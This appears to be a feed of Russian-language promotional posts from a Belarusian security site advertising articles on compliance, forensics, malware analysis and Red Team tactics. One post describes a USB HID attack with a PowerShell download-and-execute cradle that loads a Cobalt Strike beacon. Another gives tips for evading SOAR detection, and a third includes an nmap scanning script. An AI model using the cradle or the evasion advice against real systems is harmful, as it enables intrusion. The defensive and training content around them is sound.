План реагирования на инциденты для ОАЦ: как не провалить проверку 📋

Думаете, скачанный из интернета шаблон Плана реагирования на инциденты (ПРИ) прокатит на проверке ОАЦ? Это прямой путь к проблемам. ❌

Регулятор хочет видеть не просто документ, а живой и работающий процесс, адаптированный под вашу компанию.

Что должно быть в вашем плане, чтобы он выдержал любую проверку?
1️⃣ Четкая команда (CSIRT)
Это не только IT-шники! В команду должны входить юристы, коммуникационщики и представители инфраструктуры. У каждого — своя роль, прописанная в матрице RACI.

2️⃣ Пять обязательных фаз реагирования
Весь процесс должен быть разбит на понятные этапы:
🔍 Обнаружение и Анализ: Как быстро вы поняли, что вас атакуют?
🛡 Сдерживание: Как вы остановили распространение угрозы?
🧹 Искоренение: Как вы полностью удалили вредонос и закрыли уязвимость?
🔄 Восстановление: Как вы вернули системы в строй, убедившись в их чистоте?
🧠 Извлечение Уроков (Lessons Learned): Что вы сделали, чтобы это не повторилось? (Самый важный для ОАЦ этап!)

3️⃣ Регулярные киберучения
План на бумаге — ничто без практики. Докажите его работоспособность через учения:
• Табулярные (Tabletop): Обсуждение сценария за столом.
• Функциональные: Тест конкретного действия (например, восстановление из бэкапа).
• Полномасштабные: Реалистичная симуляция атаки.

Помните: для ОАЦ документирование учений и работа над ошибками важнее, чем сам факт наличия плана.

Готовитесь к проверке? В нашей новой статье — полный чек-лист для самопроверки, шаблоны коммуникаций и сценарии киберучений, которые помогут вам быть во всеоружии.

👉 Изучить детальное руководство:
https://redsec.by/article/razrabotka-plana-reagirovaniya-na-incidenty-dlya-proverki-oac-polnoe-rukovodstvo/

Сканирование портов с помощью nmap. Улучшить сканирование можно с помощью данного скрипта:
#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '
' ',' | sed s/,$//)
nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A).

Как Red Team находит ваши персональные данные? 🔴

Вы уверены, что данные ваших клиентов и сотрудников в безопасности? Указ № 422 требует от всех белорусских компаний защищать персональные данные (ПДн), но как проверить, действительно ли ваша защита работает?

Ответ — Red Team операции. Это не просто сканирование уязвимостей, а полноценная симуляция атаки на вашу компанию с одной целью: найти и "украсть" конфиденциальную информацию.

Наша новая статья подробно разбирает весь процесс с точки зрения атакующего:

🕵️‍♂️ Фаза 1: Разведка (OSINT)
Изучаем соцсети сотрудников, GitHub и открытые серверы. Удивительно, что можно найти, даже не начав взлом.

🎣 Фаза 2: Проникновение
Фишинг, эксплуатация уязвимостей в веб-приложениях — мы покажем самые популярные векторы атак, которые до сих пор работают.

📂 Фаза 3: Поиск сокровищ
Где компании чаще всего "теряют" ПДн? Забытые Excel-файлы на сетевых дисках, старые бэкапы баз данных и неправильно настроенные облачные хранилища. Мы делимся скриптами на PowerShell и Bash для их поиска.

✈️ Фаза 4: Симуляция утечки (эксфильтрация)
Как атакующие незаметно выводят данные через DNS-туннели или обычные HTTPS-запросы, оставаясь невидимыми для ваших систем безопасности.

Почему это важно?
Реальная практика показывает: многие компании не готовы к целенаправленным атакам. Обнаруженные нами в ходе симуляций проблемы — от открытых баз данных до паролей в коде — обычное дело.

🔥 Хотите узнать, как защититься и какие инструменты используют "красные команды"?

➡️ Читать полную статью на сайте https://redsec.by/article/red-team-operacii-poisk-i-eksfiltraciya-personalnyh-dannyh-v-kontekste-ukaza-422/

🔥 Гайд по форензике: что делать при взломе, чтобы соответствовать требованиям ОАЦ

Статистика неумолима: Беларусь на 2-м месте в СНГ по числу кибератак. Когда инцидент произойдет у вас, времени на Google не будет. Сохраняйте этот пост и делитесь с коллегами.

Ключевое правило: «Золотой час»
Первый час после обнаружения — самый важный. Ваша цель — собрать летучие данные (volatile data) из оперативной памяти.

❌ ГЛАВНАЯ ОШИБКА: НЕ НАЖИМАЙТЕ "ЗАВЕРШЕНИЕ РАБОТЫ"!
Штатное выключение стирает RAM, временные файлы и сетевые подключения.

Порядок действий системного администратора:

1️⃣ Изоляция. Отключите сетевой кабель от сервера. Не выключайте Wi-Fi программно! Заблокируйте скомпрометированные учетки в AD.

2️⃣ Сбор дампа RAM. Это приоритет №1. Запустите с флешки FTK Imager или Belkasoft Live RAM Capturer и сохраните дамп памяти на внешний носитель. Внутри — запущенные процессы, сетевые подключения и даже пароли злоумышленника.

3️⃣ Сбор артефактов. Используйте утилиту KAPE для быстрого сбора логов, реестра, истории браузеров и метаданных MFT. Она сделает за 10 минут то, на что вручную уходят часы.

4️⃣ Создание образа диска. Только после сбора летучих данных! Выключите систему (выдернув шнур), подключите диск через аппаратный блокиратор записи (write blocker) и создайте полную копию с помощью FTK Imager.

5️⃣ Документирование. Фотографируйте экран, записывайте каждый шаг, время и хэш-суммы всех файлов. Это основа вашего отчета для ОАЦ.

Хотите узнать, как анализировать собранные данные с помощью Autopsy и Volatility, и получить готовый шаблон отчета?

https://redsec.by/article/cifrovaya-kriminalistika-dlya-vypolneniya-trebovanij-oac-poshagovoe-rukovodstvo-dlya-sistemnogo-administratora-i-ib-specialista/

🔴 Тебе подкинули "подарок"? Антивирус спит? 🔴

Стандартная ситуация: на тачке юзера лежит подозрительный файл, почтовый шлюз пропустил фишинговое вложение, а хваленый EDR молчит. Для большинства админов это паника и переустановка системы. Для нас — начало охоты.

Забудь про "волшебные кнопки". Настоящий анализ — это грязная ручная работа. Нужно препарировать зловреда, понять его логику, вытащить C2-сервера и собрать все индикаторы компрометации (IOC), чтобы заблокировать угрозу по всей сети.

Краткий план действий. Без воды, только мясо:

1️⃣ Статический анализ (смотрим под микроскопом, не запуская):
Вычисляем хэш (sha256sum). Первым делом прогоняем его через VirusTotal. Это базовая гигиена. Если хэш известный — половина работы сделана.
Утилита strings. Вытаскиваем из бинаря все текстовые кишки: URL, IP-адреса, пути к файлам, ключи реестра. Часто самое интересное лежит на поверхности.
PEStudio. Разбираем PE-заголовок на атомы. Смотрим импорты (что он вызывает из системных DLL), энтропию (привет, упаковщики!) и подозрительные секции. Сразу становится понятно, на что способен этот "пациент".

2️⃣ Динамический анализ (запускаем в клетке и смотрим шоу):
Изолированная VM. Твой личный полигон. Никогда, слышишь, НИКОГДА не запускай это на рабочей машине. Создай чистый снэпшот, а после анализа — откатись.
Procmon. Логгируем каждое действие малвари: какой файл создала, какой процесс запустила, в какой ключ реестра полезла. Ничто не скроется от твоего взора.
Wireshark + FakeNet-NG. Ловим и анализируем весь сетевой трафик. Смотрим, куда она стучится, какие данные сливает и откуда пытается скачать новые модули.

Итог:
Перестань быть жертвой. Умение анализировать малварь — это твой личный скилл, который отделяет профессионала от эникейщика. Это основа основ для любого, кто занимается реагированием на инциденты (DFIR) и проактивным поиском угроз (Threat Hunting).

🔥 Хочешь полное руководство со всеми командами, инструментами и реальными примерами?

Вся инфа от А до Я ждет тебя в нашей новой статье на сайте. Время прокачивать скиллы!
https://redsec.by/article/nam-podbrosili-zlovred-polnoe-rukovodstvo-po-bazovomu-analizu-vredonosnogo-po-svoimi-rukami/

Blue Team спит. Скрипты работают. 💀

Пока "синие" пьют утренний кофе и смотрят в дашборды своего SIEM, твой код должен бесшумно обходить периметр. Ручная работа — удел дилетантов. Профессионалы пишут инструменты под себя.

Забудь про готовые комбайны. Они шумят, оставляют тонны следов и предсказуемы для любой EDR. Твой собственный сканер на Python/Go — это призрак в сети. Он делает только то, что нужно. Никаких лишних пакетов, никаких стандартных юзер-агентов.
Простой пример: пока nmap молотит по всем портам, твой скрипт может сначала собрать открытые порты через masscan, а потом точечно, с кастомными задержками, опрашивать только их, мимикрируя под легитимный трафик.

Истина: Системы защиты рассчитаны на известные инструменты. Стань неизвестным. Твой код — твоё главное оружие. Если ты не пишешь свои тулзы, ты просто ещё один скрипт-кидди, играющий чужими игрушками.

https://redsec.by/article/sozdanie-sobstvennyh-instrumentov-avtomatizaciya-dlya-pentestera-i-administratora-na-python-i-powershell/

SOAR: Их новый автоматизированный цербер. Учимся обходить.

Замечал, что твои IoC стали отлетать быстрее? Что хост уходит в изоляцию через 5 минут после заражения, а не через 5 часов? Поздравляю, скорее всего, ты столкнулся с SOAR.

"Синие" перестали кликать мышкой. Теперь за них работает робот.
Что это такое, на нашем языке:
SOAR (Security Orchestration, Automation, Response) — это скрипт-переросток, который они натравили на свои SIEM, EDR и файрволы.
Оркестровка: Их зоопарк тулзов (SIEM, EDR, TI-фиды) теперь работает как единое целое. Алерт из SIEM триггерит действие в EDR.
Автоматизация: Рутинные задачи, которые раньше делал сонный аналитик, теперь выполняет машина. 24/7. Без кофе-брейков.

Как выглядит твой провал на их стороне (типичный плейбук):
Триггер: Твой фишинговый домен спалился в SIEM. Алерт улетает в SOAR.
Обогащение: SOAR мгновенно пробивает твой домен, IP и хеш файла по всем доступным Threat Intelligence базам. Твои свежезареганные домены уже не такие свежие.

Реакция:
Домен и IP летят в бан на прокси и почтовом шлюзе.
Письмо удаляется из ящиков всех, кто его получил.
Если кто-то кликнул — EDR получает команду изолировать хост от сети.
Учётка юзера блокируется в AD.
Весь этот цикл занимает 2-5 минут. Пока ты ждешь шелл, тебя уже выкинули из сети.

Что делать:
Скорость: Твои действия после компрометации должны быть быстрее их автоматизации.
Бесшумность: Минимизируй количество артефактов. Используй легитимные сервисы (Living off the Land). SOAR работает по четким индикаторам. Нет индикаторов — нет реакции.

Диверсификация: Используй разную инфраструктуру. Если один домен сожгли, должен быть готов второй.
Запомни: ты воюешь не с человеком, а с алгоритмом. Думай, как его обмануть.

https://redsec.by/article/soar-platformy-na-sluzhbe-ib-kak-robotizirovat-reagirovanie-na-incidenty-i-pobedit-rutinu/

Тот самый момент, когда видишь в отчете по безопасности пункт
"Контроль USB-носителей: ✅ выполнено". Сразу понимаешь — вход будет легким. 😉

Они тратят миллионы 💰 на DLP и пишут GPO, чтобы заблокировать Mass Storage Class. Это так мило. Они думают, что защитились от утечек 📁. А мы не собираемся ничего копировать.

Мы собираемся отдавать команды. ⚡️
Берется Raspberry Pi Pico за $10. Заливается DuckyScript 🦆. Полезная нагрузка — однострчный PowerShell для загрузки маяка Cobalt Strike 📡.

(new-object net.webclient).downloadstring(...) | iex

— вы знаете эту классику.
Устройство летит на парковку 🚗 или в курилку. Любопытный сотрудник 🧑‍💼 подбирает "флешку". Вставляет 🔌.

Что происходит дальше:
1️⃣ Их DLP спит 💤.
2️⃣ Их EDR видит... новую клавиатуру. 👁➡️⌨️

Пока система думает, HID-эмулятор уже ввел пейлоад.

⏱️ Через 3 секунды у меня в консоли новый бикон.

Итог: RCE внутри периметра. 💥

Их политика безопасности рассчитана на бухгалтера с вирусом. Наша атака — на фундаментальное доверие ОС к устройствам ввода. Они заблокировали дверь для файлов 🚪, пока мы заходим через окно для команд 🖼.

Их галочка в чек-листе — наше приглашение.

https://redsec.by/article/illyuziya-kontrolya-pochemu-blokirovka-usb-nakopitelej-eto-ne-bezopasnost/

Пока вы тешите себя иллюзиями, что «нас ломать не будут, мы никому не нужны», я уже вижу ваши торчащие RDP наружу на Shodan и пароли от админок в утечках пятилетней давности.

Давайте честно: построить нормальный отдел ИБ в Беларуси — это тот еще квест. С одной стороны, давят регуляторы (ОАЦ, персданные), с другой — бизнес жмется на бюджеты и верит, что системный админ Вася в перерывах между эникейством защитит периметр от APT-группировки. Спойлер: не защитит. Я зайду в вашу сеть быстрее, чем Вася допьет свой утренний кофе.

Накатал подробный мануал, как выстроить оборону с нуля и не слить бюджет в унитаз на бесполезные «коробки». Без маркетинговой шелухи, чисто по хардкору и реалиям рынка.

Разложил по фактам:
💀 Почему нельзя подчинять безопасников IT-директору (это прямой путь к инциденту).
💀 Кого нанимать: почему юрист, инженер и аналитик — это не может быть один человек, даже если очень хочется сэкономить.
💀 Цифры: сколько реально стоит защита в 2025 году, и почему аутсорс SOC дешевле, чем строить свой звездолет.
💀 Как продать идею безопасности боссу, которому плевать на все, кроме прибыли.
Если не хотите, чтобы завтра ваша база клиентов гуляла по даркнету, а вы судорожно искали крипту для выкупа шифровальщика — читать обязательно. Это база, на которой держится ваше выживание.

https://redsec.by/article/kak-postroit-otdel-ib-s-nulya-v-belorusskoj-kompanii-poshagovoe-rukovodstvo-dlya-rukovoditelej/

🔥 Хватит быть "сторожем". Пора становиться тем, от кого охраняют.

Если ты годами настраиваешь Active Directory, поднимаешь сети и пишешь скрипты на PowerShell для автоматизации рутины — у меня для тебя новость. Ты сидишь на сундуке с золотом, но продолжаешь работать за еду.
Системный администратор — это самый опасный кандидат в Red Team. В отличие от курсантов, которые выучили пару команд в Metasploit, ты понимаешь физику процессов. Ты знаешь, как строится дом, а значит, интуитивно чувствуешь, где строители схалтурили.

Я подготовил подробный разбор карьерного транзита SysAdmin -> Red Teamer в реалиях белорусского рынка. Без инфоцыганства и сказок про "миллион сразу", только техническая фактура.

В статье разобрал:
💀 Смена майндсета: Как перестать латать дыры и начать их эксплуатировать. Почему твой идеальный GPO — это моя точка входа.
🛠 Технический стек: Почему тебе срочно нужен BloodHound и Impacket, и как превратить админский PowerShell в weaponized-скрипты.
📜 Сертификация: Что реально котируется в РБ и мире. Почему CRTP для админа полезнее, чем распиаренный CEH.
💰 Рынок и цифры: Реальные вилки зарплат в Минске, требования ОАЦ и где искать вакансии.
🏠 Home Lab: Готовая схема домашнего полигона, чтобы тренировать атаки на AD (Kerberoasting, DCSync) без риска сесть по 354 УК РБ.

Рынок Offensive Security в Беларуси сейчас — это непаханое поле. Компании ищут инженеров, а не скрипт-кидди. Твой опыт — твой главный эксплойт. Используй его.

🔗 Читать полный гайд: https://redsec.by/article/karernyj-tranzit-kak-sistemnomu-administratoru-stat-red-teamerom-v-belarusi-polnyj-gajd/

Периметр дырявый. WAF обходится. Пароли брутятся или утекают через фишинг. Как Red Teamer скажу прямо: если до твоего порта можно достучаться по сети — это уже моя территория. Единственное, что я не могу взломать удаленно через эксплойт или RCE — это физику.

Написал подробный мануал по созданию «Цифрового бункера».

Строим архитектуру резервного копирования, которую невозможно скомпрометировать без физического присутствия администратора.

Что внутри:
💀 Hardware Auth: Харденинг SSH до параноидального уровня. Вход только по ключу Ed25519, который лежит на USB-токене. Нет флешки в порту — нет коннекта.
💀 Zero Knowledge: Сервер бэкапов принимает данные, но не может их прочитать. Client-side encryption решает.
💀 Stack: Связка Debian + Proxmox Backup Server + Restic.
💀 Defense: Защита от шифровальщиков и кражи «железа». Если сервер вынесут из офиса, внутри найдут только цифровой шум.
Это не просто «настройка бэкапов». Это полное отрезание вектора атаки Lateral Movement.

Читать гайд: https://redsec.by/article/stroim-cifrovoj-bunker-udalennyj-dostup-po-fizicheskomu-klyuchu-i-zero-knowledge-bekapy/

Асимметрия 1 к 100: почему ваш периметр — это решето

Давайте честно. Как пентестер, я люблю компании, где ИБ-отдел пытается контролировать всё сам. Это мои любимые клиенты. Пока три замученных безопасника разгребают логи SIEM, разработчик в соседнем здании хардкодит AWS-ключи в публичный репозиторий, а HR открывает «резюме» с макросом.

Математика против вас. В среднем на одного безопасника приходится 100 сотрудников. В таких условиях вы не защитники, вы — бутылочное горлышко. Пытаться закрыть собой все амбразуры — тупиковая стратегия, которая ведет к выгоранию команды и успешному взлому.

Единственный способ выжить и масштабироваться без раздувания штата до размеров армии — внедрение программы Security Champions.

Это не про «назначить ответственных». Это про создание децентрализованной агентурной сети внутри каждого отдела. Когда разработчик, бухгалтер или маркетолог становятся вашими глазами и ушами на местах.

Написал подробный мануал, как построить такую систему и не превратить её в фикцию.

Внутри разбор полетов:
▪️ Как продать идею бизнесу через ROI, а не через страх (кейсы Sage и Adobe).
▪️ Почему «пожарные маршалы» и «парамедики» — лучшие аналогии для чемпионов.
▪️ Модель SAPS: чем мотивировать людей, если нет бюджета на премии.
▪️ Разделение треков: почему нельзя учить девопса и юриста по одной презентации.
▪️ Метрики, которые реально показывают снижение Attack Surface, а не просто «количество обученных».

Если хотите перестать тушить пожары и начать строить архитектуру, которая сопротивляется атакам изнутри — читать обязательно.

🔗https://redsec.by/article/programma-chempionov-bezopasnosti-kak-masshtabirovat-ib-i-vyrastit-soyuznikov-v-kazhdom-otdele/

Гибрид — это не защита. Это два входа в один проходной двор.

Пока энтерпрайз радостно настраивает «бесшовный вход» для удобства бухгалтерии, мы видим в Azure AD Connect идеальный плацдарм. Для Red Team это буквально мост, который работает в обе стороны: взломал локалку — получил облако, перехватил сессию в облаке — зашел в локальный периметр.

Подготовил подробный разбор механик, которые мы используем на проектах, чтобы показать бизнесу, как быстро падает их «защищенная» инфраструктура.

Внутри лонгрида:
▪️ AADInternals в деле: как за две команды вытащить plain-text креды синхронизации и сэскалироваться до Global Admin.
▪️ Pass-the-PRT: почему ваш MFA бессилен, если мы уже на хосте, и как Primary Refresh Token открывает двери обратно в on-prem.
▪️ Золотые ключи: эксплуатация OAuth токенов и уязвимостей Exchange Hybrid, о которых забывают 9 из 10 админов.
▪️ DCSync для облака: как через локальный AZUREADSSOACC$ нарезать себе билетов в M365.

Разбираем реальные кейсы и ошибки конфигурации, которые превращают сервер синхронизации в Tier 0 актив, который вы оставляете без присмотра.

Читать, чтобы понять вектор атаки и закрыть дыры до того, как мы (или кто-то похуже) ими воспользуемся.

🔗https://redsec.by/article/atakuem-gibridnuyu-sredu-kak-uyazvimosti-v-lokalnom-active-directory-privodyat-k-komprometacii-oblaka-microsoft-365-i-naoborot/

🐳 Контейнеры текут. И ваши тоже.

Давайте честно: большинство разработчиков до сих пор считают, что Docker-контейнер — это пуленепробиваемая виртуалка. Для нас, Red Team специалистов, это звучит как приглашение на вечеринку.

Контейнер — это всего лишь процесс Linux, обложенный namespaces и cgroups. И эти стены ломаются проще, чем кажется.

В новом лонгриде разобрал полную анатомию атак на контейнерную инфраструктуру. Без воды, только хардкорные сценарии, которые мы используем на пентестах:
▪️ Application Layer: Как через банальную SQL-инъекцию или RCE получить токен сервис-аккаунта и начать разведку в кластере.
▪️ Container Escape: Почему монтирование /var/run/docker.sock — это выстрел себе в ногу из дробовика, и как эксплуатировать cgroup v1 (CVE-2022-0492), чтобы выйти на хост-систему.
▪️ K8s Takeover: Как кривой RBAC и "ленивые" админы дарят нам ключи от всего кластера Kubernetes.

И самое важное для тех, кто работает в юрисдикции РБ: подробно разобрал, как это всё мэтчится с требованиями ОАЦ (Приказ №130). Почему синхронизация времени, иммутабельные логи и Falco — это не просто "для галочки", а реальный способ пережить аудит и не потерять аттестат.

Если у вас в проде крутится Kubernetes, а в подах есть privileged: true — считайте, что мы уже внутри.

Читаем, ужасаемся, фиксим:
🔗https://redsec.by/article/bezopasnost-kontejnerov-ot-docker-escape-do-zahvata-kubernetes-polnyj-gid-po-auditu-i-trebovaniyam-oac/

Ваши слайды для совета директоров — мусор. 🗑

Серьезно. Пока вы рисуете красивые графики с «миллионом заблокированных атак» на фаерволе, мы уже внутри. Мы сидим в вашей инфраструктуре неделями, потому что ваш SOC тонет в логах, а CISO не может выбить бюджет на нормальный EDR и людей.

Бизнес не понимает язык эксплойтов. Финансовому директору плевать на CVE и 0-day. Ему важны только деньги и риски. Если вы не умеете переводить технический ад в финансовые потери — вы проиграли войну за бюджет еще до её начала. А значит, проиграете и нам.

Я написал мануал, как перестать быть «IT-обслугой» и начать говорить с бизнесом на равных. Без булшита.

Внутри разбор того, что реально влияет на вашу выживаемость:
💀 MTTD/MTTR — почему время работает против вас. Если вы не выкидываете нас за час, считайте, что мы уже всё зашифровали.
🎯 Покрытие и гигиена — почему 85% EDR это не «хорошо», а открытая дверь для Red Team.
💸 ALE и ROI — как доказать на цифрах, что один пропущенный инцидент стоит дороже, чем весь ваш отдел ИБ за год.

Забирайте материал. Перестаньте кормить руководство «ванильными метриками» и начните строить защиту, которая реально мешает работать таким, как я.
https://redsec.by/article/metriki-dlya-ciso-kak-dokazat-effektivnost-programmy-ib-rukovodstvu-na-yazyke-biznesa/

ОАЦ и Приказ №66 — это не повод сливать годовой бюджет на лицензии, чтобы просто получить «бумажную» безопасность.

Давайте честно: хакеру плевать, сколько вы заплатили за SIEM — 50 тысяч долларов или ноль. Ему важно, увидит ли SOC его активность в сети или будет спать. А регулятору важен не чек об оплате, а выполнение мер защиты.

Многие CISO до сих пор живут в парадигме «купить коробку = закрыть вопрос». Это путь в никуда. Я подготовил жесткий разбор того, как выстроить эшелонированную оборону на Open Source, которая реально работает и проходит аттестацию в Беларуси.

В статье разобрал «святую троицу», закрывающую 90% технических требований Приказа №66:
💀 Wazuh — вместо KUMA и MaxPatrol. Делаем полноценный SIEM/XDR, настраиваем FIM (контроль целостности) и retention policy для логов, чтобы аудитор был счастлив, а периметр под присмотром.
💀 OpenVAS — вместо дорогих сканеров. Как настроить Authenticated Scan и находить CVE внутри системы до того, как их проэксплуатируют пентестеры (или реальные злоумышленники).
💀 GoPhish — потому что «инструктаж под роспись» не работает. Запускаем свои фишинговые кампании и лечим сотрудников, которые любят открывать вложения от «налоговой».

Хватит кормить вендоров, лучше прокачивайте экспертизу внутри команды. Безопасность — это процесс, а не покупка индульгенций.
Мануал по развертыванию и аргументация для бизнеса здесь:
https://redsec.by/article/optimizaciya-zatrat-na-ib-kak-open-source-zakryvaet-trebovaniya-oac-bez-pokupki-boinga/

Бумажный щит не спасет от реального шелла.

Давайте честно: аттестат соответствия, висящий в рамке у CISO, не остановит ни шифровальщика, ни целевую атаку. В нашей индустрии есть опасная иллюзия, что Compliance = Security. На практике же аудиторы проверяют документы, а мы проверяем реальность. И реальность обычно проигрывает.

Я подготовил жесткий разбор белорусской нормативки (Приказ ОАЦ №66, Указ №449, Закон о ПДн), но не с точки зрения юриста, а через прицел Red Team. Разобрал, как скучные пункты законов превращаются в векторы атак.

В статье:
▪️ Почему ваша парольная политика по Приказу №66 падает за 20 минут через Password Spraying и Kerberoasting.
▪️ Как требование сегментации КВОИ (Указ №449) обходится через Lateral Movement и забытые SMB-шары.
▪️ Почему SSL-сертификат на сайте не спасает от MitM и штрафов по 99-З, если дев-команда забыла про HSTS.

Это мануал о том, как продать руководству реальную безопасность, используя страх перед регулятором. Переводим юридический язык на язык эксплойтов и бизнес-рисков.
Читать полный гайд: https://redsec.by/article/navigator-po-kiber-zakonam-rb-dlya-red-team-i-ciso-kak-prevratit-trebovaniya-oac-v-scenarii-dlya-pentesta/

Зачем мне ломать ваш Firewall за $50k, если я могу зайти через парадную дверь с коробкой пиццы и ламинированным бейджем?

Red Team — это тест на прочность не ваших серверов, а вашей организации в целом. Мы смотрим, насколько легко ваши сотрудники ведутся на социалку, как быстро охрана теряет бдительность в обеденный перерыв и сколько «мертвых душ» из числа уволенных админов всё еще имеют права доступа к вашим бэкапам.

Технологии — это только фасад. Настоящая дыра в безопасности — это человеческая вежливость, избыточные права доступа и процессы, которые существуют только на бумаге.

Разложил по полочкам, как мы обходим «электронную охрану» с помощью психологии, почему фишинг — это всё еще 80% успеха любого взлома и как реально прокачать «Человеческий файрвол» до версии 2.0. Внутри — рабочие кейсы по физическому проникновению, вишингу и созданию Security Champions в каждом отделе.

Если вы думаете, что ваша компания защищена, потому что у вас стоит дорогой EDR — эта статья для вас. Хакеры не ломают замки, они просят их открыть.

Читаем здесь:
https://redsec.by/article/chelovecheskij-fajrvol-20-organizacionnaya-zashita-ot-red-team-atak/

100 страниц «идеальной» политики безопасности против одного голодного Red Teamера. Кто победит?

Спойлер: тот, у кого в руках хеш вашего сервисного аккаунта через 2 часа после старта.

В 2025 году мы всё еще видим этот карго-культ: компании тратят миллионы на консалтинг и «бумажную безопасность», которая рассыпается в прах при первой же попытке Kerberoasting. Галочка в чек-листе регулятора не защищает от Lateral Movement, а требование «не открывать вредоносные файлы» вызывает у атакующих только циничную улыбку.

Если ваша политика безопасности живет только в Вики, а не в правилах Firewall и конфигах PAM-системы — у вас нет безопасности. У вас есть иллюзия.

Разложил по полочкам, почему «мертвые» политики — это подарок для хакера, и как превратить скучный регламент в живой механизм, который реально усложнит нам жизнь. Внутри — технический разбор анатомии взлома, реальные кейсы по Tiered Administration и микросегментации, которые не дают захватить домен за обеденный перерыв.

Статья для тех, кто устал от ИБ «для галочки» и хочет строить защиту, исходя из парадигмы Assume Breach.

Читай здесь:
https://redsec.by/article/politiki-informacionnoj-bezopasnosti-kotorye-vyderzhivayut-udar-red-team-ot-bumazhnoj-bezopasnosti-k-zhivym-kontrolyam/

Большинство компаний до сих пор верят, что файрвол — это панацея. Спойлер: нет. В 2025 году сетевой периметр — это не бетонная стена, а дырявый забор, где новые дыры оставляют сами владельцы.

Забытые инстансы в облаках, открытый RDP «на полчасика» для удаленки и VPN с паролем уровня Company2024 — это классика, которая ежедневно кормит группировки шифровальщиков. Red Team не читает ваши красивые регламенты и не смотрит в схемы сети. Мы ищем то, что вы забыли внести в инвентаризацию. Если сервер отвечает в интернет — он потенциально наш.

В новом материале разложил по полочкам всю механику прорыва: от OSINT-разведки, когда мы не отправляем ни одного пакета на ваши узлы, до захвата контроллера домена через «дырявый» тестовый веб-сервер.

Разбираем:
— Почему OSINT эффективнее любого сканера уязвимостей.
— Как дефолтные креденшалы в Tomcat и Jenkins становятся пригласительным билетом в вашу внутреннюю сеть.
— Почему «бумажная» безопасность и комплаенс ОАЦ РБ разбиваются о реальный брутфорс за 4 часа.
— И главное: как закрыть периметр так, чтобы Red Team ушла ни с чем.

Лонгрид для тех, кто хочет строить реальную защиту, а не жить в иллюзиях:
https://redsec.by/article/perimetr-seti-pod-pricelom-kak-red-team-nahodit-dyry-v-vashej-zashite-do-togo-kak-eto-sdelayut-hakery/

Плоская сеть — это не просто архитектурная ошибка, это открытое приглашение на чаепитие к вашему контроллеру домена. Для любого, кто хоть раз держал в руках BloodHound, отсутствие сегментации превращает захват организации в легкую прогулку. Пока админы спорят о сложности паролей, мы смотрим на топологию. Если я упал на хост в VLAN 10 и вижу по SMB весь серверный сегмент — игра окончена.

В 2025 году скорость решает всё. Тот же LockBit шифрует инфраструктуру быстрее, чем вы успеете налить кофе. У Red Team есть в среднем 48 минут на латеральное движение, но в плоской сети этот тайминг сокращается до клика мышкой. Если между бухгалтером и базой данных нет жесткого ACL, блокирующего 445-й порт и WinRM, то никакая EDR-система вас не спасет — вы просто будете наблюдать за своей гибелью в прямом эфире.

В новом материале разобрал техническую сторону вопроса: от конфигурации тегированных VLAN на Cisco до создания «непробиваемых» политик на FortiGate. Никакой воды, только хардкор: какие порты резать в первую очередь, как изолировать гостевой Wi-Fi и почему принцип Default Deny — это единственное, что заставит атакующего потеть и ошибаться.

Если ваша сеть до сих пор напоминает проходной двор без дверей — этот гайд для вас. Читайте, внедряйте и не давайте нам шансов на легкий Domain Admin.

https://redsec.by/article/segmentaciya-seti-kotoraya-realno-rabotaet-kak-ostanovit-lateralnoe-dvizhenie-red-team-i-spasti-biznes/